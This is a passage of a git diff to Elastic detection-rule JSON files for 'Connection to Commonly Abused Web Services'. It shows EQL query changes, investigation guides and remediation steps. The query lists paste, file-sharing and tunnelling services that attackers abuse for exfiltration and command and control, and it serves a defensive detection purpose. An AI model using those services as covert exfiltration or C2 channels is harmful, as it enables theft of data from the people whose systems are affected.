post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not process.executable :\n (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Discord\\\\app-*\\\\Discord.exe\"\n )\n", "related_integrations": [ { @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_105.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_105.json index 7fdb278b0d8..325c7747c2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_105.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_105.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n )\n ) \n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_106.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_106.json index 6b400fc81db..02ca639479b 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_106.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_106.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n )\n ) \n", "related_integrations": [ { @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_107.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_107.json index 966c1e487e1..eb2b322baa0 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_107.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_107.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` 